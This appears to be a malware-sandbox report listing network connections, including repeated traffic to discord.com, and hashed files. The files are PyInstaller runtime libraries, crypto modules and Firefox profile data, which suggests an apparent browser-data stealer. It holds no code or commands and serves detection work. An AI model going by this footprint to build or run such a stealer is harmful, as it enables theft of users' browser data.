GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 play.google.com udp
US 162.159.138.232:443 discord.com tcp
GB 172.217.169.46:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
GB 172.217.169.46:443 play.google.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 id.google.com udp
FI 173.194.220.94:443 id.google.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
FI 173.194.220.94:443 id.google.com udp
FR 172.217.18.214:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
FR 172.217.18.214:443 i.ytimg.com tcp
FR 172.217.18.214:443 i.ytimg.com udp
US 8.8.8.8:53 214.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 94.220.194.173.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.201.110:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.201.110:443 youtube-ui.l.google.com udp
GB 216.58.201.110:443 youtube-ui.l.google.com tcp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 162.159.138.232:443 discord.com tcp
GB 216.58.201.110:443 youtube-ui.l.google.com udp
FR 172.217.18.214:443 i.ytimg.com tcp
US 162.159.138.232:443 discord.com tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 162.159.138.232:443 discord.com tcp
FR 172.217.18.214:443 i.ytimg.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
FR 172.217.18.214:443 i.ytimg.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 162.159.138.232:443 discord.com tcp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 rr1---sn-aigzrnld.googlevideo.com udp
US 162.159.138.232:443 discord.com tcp
GB 74.125.97.70:443 rr1---sn-aigzrnld.googlevideo.com tcp
GB 74.125.97.70:443 rr1---sn-aigzrnld.googlevideo.com tcp
US 8.8.8.8:53 rr1.sn-aigzrnld.googlevideo.com udp
US 8.8.8.8:53 84.27.250.142.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 rr1.sn-aigzrnld.googlevideo.com udp
FR 172.217.20.196:443 www.google.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 172.217.20.196:443 www.google.com udp
US 8.8.8.8:53 rr1---sn-aigzrnld.googlevideo.com udp
US 8.8.8.8:53 70.97.125.74.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI14522\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

\Users\Admin\AppData\Local\Temp\_MEI14522\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

\Users\Admin\AppData\Local\Temp\_MEI14522\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

\Users\Admin\AppData\Local\Temp\_MEI14522\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

\Users\Admin\AppData\Local\Temp\_MEI14522\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

\Users\Admin\AppData\Local\Temp\_MEI14522\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

\Users\Admin\AppData\Local\Temp\_MEI14522\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

\Users\Admin\AppData\Local\Temp\_MEI14522\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

\Users\Admin\AppData\Local\Temp\_MEI14522\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

\Users\Admin\AppData\Local\Temp\_MEI14522\_wmi.pyd

MD5 7ec3fc12c75268972078b1c50c133e9b
SHA1 73f9cf237fe773178a997ad8ec6cd3ac0757c71e
SHA256 1a105311a5ed88a31472b141b4b6daa388a1cd359fe705d9a7a4aba793c5749f
SHA512 441f18e8ce07498bc65575e1ae86c1636e1ceb126af937e2547710131376be7b4cb0792403409a81b5c6d897b239f26ec9f36388069e324249778a052746795e

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_uuid.pyd

MD5 353e11301ea38261e6b1cb261a81e0fe
SHA1 607c5ebe67e29eabc61978fb52e4ec23b9a3348e
SHA256 d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899
SHA512 fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_overlapped.pyd

MD5 ba368245d104b1e016d45e96a54dd9ce
SHA1 b79ef0eb9557a0c7fa78b11997de0bb057ab0c52
SHA256 67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615
SHA512 429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_multiprocessing.pyd

MD5 a4281e383ef82c482c8bda50504be04a
SHA1 4945a2998f9c9f8ce1c078395ffbedb29c715d5d
SHA256 467b0fef42d70b55abf41d817dff7631faeef84dce64f8aadb5690a22808d40c
SHA512 661e38b74f8bfdd14e48e65ee060da8ecdf67c0e3ca1b41b6b835339ab8259f55949c1f8685102fd950bf5de11a1b7c263da8a3a4b411f1f316376b8aa4a5683

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_asyncio.pyd

MD5 28d2a0405be6de3d168f28109030130c
SHA1 7151eccbd204b7503f34088a279d654cfe2260c9
SHA256 2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d
SHA512 b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0

C:\Users\Admin\AppData\Local\Temp\_MEI14522\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI14522\pyexpat.pyd

MD5 5e911ca0010d5c9dce50c58b703e0d80
SHA1 89be290bebab337417c41bab06f43effb4799671
SHA256 4779e19ee0f4f0be953805efa1174e127f6e91ad023bd33ac7127fef35e9087b
SHA512 e3f1db80748333f08f79f735a457246e015c10b353e1a52abe91ed9a69f7de5efa5f78a2ed209e97b16813cb74a87f8f0c63a5f44c8b59583851922f54a48cf5

\Users\Admin\AppData\Local\Temp\_MEI14522\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md.cp312-win_amd64.pyd

MD5 d9e0217a89d9b9d1d778f7e197e0c191
SHA1 ec692661fcc0b89e0c3bde1773a6168d285b4f0d
SHA256 ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0
SHA512 3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 bf9a9da1cf3c98346002648c3eae6dcf
SHA1 db16c09fdc1722631a7a9c465bfe173d94eb5d8b
SHA256 4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637
SHA512 7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

C:\Users\Admin\AppData\Local\Temp\_MEI14522\certifi\cacert.pem

MD5 d3e74c9d33719c8ab162baa4ae743b27
SHA1 ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b
SHA256 7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92
SHA512 e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ecb.pyd

MD5 fee13d4fb947835dbb62aca7eaff44ef
SHA1 7cc088ab68f90c563d1fe22d5e3c3f9e414efc04
SHA256 3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543
SHA512 dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_cbc.pyd

MD5 20708935fdd89b3eddeea27d4d0ea52a
SHA1 85a9fe2c7c5d97fd02b47327e431d88a1dc865f7
SHA256 11dd1b49f70db23617e84e08e709d4a9c86759d911a24ebddfb91c414cc7f375
SHA512 f28c31b425dc38b5e9ad87b95e8071997e4a6f444608e57867016178cd0ca3e9f73a4b7f2a0a704e45f75b7dcff54490510c6bf8461f3261f676e9294506d09b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_cfb.pyd

MD5 43bbe5d04460bd5847000804234321a6
SHA1 3cae8c4982bbd73af26eb8c6413671425828dbb7
SHA256 faa41385d0db8d4ee2ee74ee540bc879cf2e884bee87655ff3c89c8c517eed45
SHA512 dbc60f1d11d63bebbab3c742fb827efbde6dff3c563ae1703892d5643d5906751db3815b97cbfb7da5fcd306017e4a1cdcc0cdd0e61adf20e0816f9c88fe2c9b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ofb.pyd

MD5 4d9182783ef19411ebd9f1f864a2ef2f
SHA1 ddc9f878b88e7b51b5f68a3f99a0857e362b0361
SHA256 c9f4c5ffcdd4f8814f8c07ce532a164ab699ae8cde737df02d6ecd7b5dd52dbd
SHA512 8f983984f0594c2cac447e9d75b86d6ec08ed1c789958afa835b0d1239fd4d7ebe16408d080e7fce17c379954609a93fc730b11be6f4a024e7d13d042b27f185

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ctr.pyd

MD5 c6b20332b4814799e643badffd8df2cd
SHA1 e7da1c1f09f6ec9a84af0ab0616afea55a58e984
SHA256 61c7a532e108f67874ef2e17244358df19158f6142680f5b21032ba4889ac5d8
SHA512 d50c7f67d2dfb268ad4cf18e16159604b6e8a50ea4f0c9137e26619fd7835faad323b5f6a2b8e3ec1c023e0678bcbe5d0f867cd711c5cd405bd207212228b2b4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

MD5 c27d96ff24908f1e2ab5886bec5a8951
SHA1 ad0f8887cd301c2c1d689479ec21348a5fe032ac
SHA256 829067ffb6507b5fdb6f11fbcc43f48485330528f004a1d06e36b31cc58f53ff
SHA512 3baa53cf21bf066e4f6ed0862ff2af9b403f44081aec8eacf9500dce91cdc398ff05fd879ef50a08c207fe6347aa1e3bfe7c6cc9b2a7a50b01ced6861b42b41d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\f1d286bc-478f-4dc5-940a-66210aecca90

MD5 785c5500899cefa9267a75fddd14f63f
SHA1 8e9a18ba441be6e49f1fe149565b1bba1f249245
SHA256 8091e304f4f36214e5803f420019b906af818a7afc9c0bd5efc9be6acabdb470
SHA512 7f11fa2ad1200dc1bbf890bb51cb72474c88e3a1e91acea81f5a23c8054b4b0c77d51b9608a80a3054773debe6d60ecb466b98636bc7a63b2651bcd1d4237fcf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\1b27f736-116f-41f2-adb2-647564d79b78

MD5 154c72e6676dfddac1c3ef2bc3766c14
SHA1 5437def2450ca7ff4b98860b09bc0c626d954ab1
SHA256 5593605e26b45a4231caa0188166f7e0d469c5479887219a7b6054353a28ad3f
SHA512 cfd25a61331ffd8f33593773c86d873200bcb941a3f056e39179ed7a35b67066ad9d6c015a91eb98821c83d53b829f7d5b4ae9dc91edc3060693099f2caaf8cd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 c90b8498e3c39547d9304ce1f69ad6d6
SHA1 a24ef99d4d13fce0166dc10ca00d778fcba6d1c1
SHA256 8ccf4be22c2555836b82c80bf3a076ffc172e7dbb088ee5fbd68ab61f2cc40ad
SHA512 3562df62a1c174b069040f1e7a9bd7dac71736c71568466baa41a1927c37e086c2ed7675df8c39fd760e25d0a40f2188a3f812bc9daefec6b534c100b5dee984

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 e9cd3dd63828b4b57dc6debe97e0af80
SHA1 7943380c98d24d33b48f8273a997d4cf1245b83c
SHA256 282d676d64841fff967ca18d2662ed91a0d979cb9b39809e3fa3a3b3dd4238b7
SHA512 ff288ceb1ba22f5d0cc6f5d7aaa3ab7fe28a9ffb8f4f6c0415f837eaeff12a75061593ab28f90cb86211b91335c2a047cfba22524eccbaf056a0f3b05075f7c4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

MD5 50c218905872cbd44bdbbf49ad2bd29e
SHA1 652b5ca3ccbbb1a0fae691bd4977294a1ae478c9
SHA256 e1557d2d973e3489a6b9560856acda4ccf62c56e7324a48ffb6249531c89e8f5
SHA512 b9fb4442d3eeb3b4301a166cd06d0bc58d3563018de80dcd56ba38cf3091cc77186241eb231852a34edf6bf26fa3b6025f11087b23463501b818b68decc7c841

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 2d0fd71d9fd103c520da490d5adf1222
SHA1 f85b538c7a1027b078b296d6528e654df03688a8
SHA256 3acc3d178890de13ecb865056b2f931c7b51464bbcfc3d475bc4f7cddab591c8
SHA512 91ac55ee84353440ac63dae1557ae436fe3a6b6bb396418ca91d20daa1eca3e2bdf2d94bbf5ad5ed56dffd2c926fd90c0f9fa7fdb6d32a5367a654fa679e89ba

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\cache2\doomed\26113

MD5 0f77caa7dd3e60173d9d20da48f8b65e
SHA1 6515da7eb0724ef3921557ef397ba43cfc379fde
SHA256 63874638f2dc400240ef4ad0e9d7e318531773da1869f94f64ff9fb1e6652577
SHA512 77a165d49df795c25313a67f1d9928564052fb0bc22274d04e211117b82c3980e5fe1a922b691436bb6cf62774282d4e988e84a5f193de68eef709878e60fc59

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.youtube.com\cache\morgue\69\{880688a4-93df-43f1-9ccb-d770b767dc45}.final

MD5 2a252393b98be6348c4ba18003cc3471
SHA1 40f75302fcbe4a8ac2e33a8d9daf801abc2a9598
SHA256 04cae3c7b208fc55b25763913d0bbdc99232942086efdf705f2a27764be6f5ee
SHA512 07af4a7b0d10f1b5e1fe0877b21abc98483d78797608a1763cfb71e25559fdce10d20f03c16f4284d7ae7ab90266f45240425e3a264de9525ec1657345b85198

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.youtube.com\idb\788007792yCt7-%iCt7-%r0e3sdpfo.sqlite

MD5 ab336cb67d69555fff5600eec86ab564
SHA1 0b96b8bf897199caa0ee0aa981cdd68e3b68fecf
SHA256 1ba0a8f09d47dd740b2df1e77223bdf780564946735aaa77b63058561e569e32
SHA512 8648f5074cb8f455252eec1cc923a1951130355b95cdf8a2517db5487c509dbb7b1ec9a33daea0e3f966f45cfdb36c7cf7f31d84f65fa421a2e6edc65ffc0da5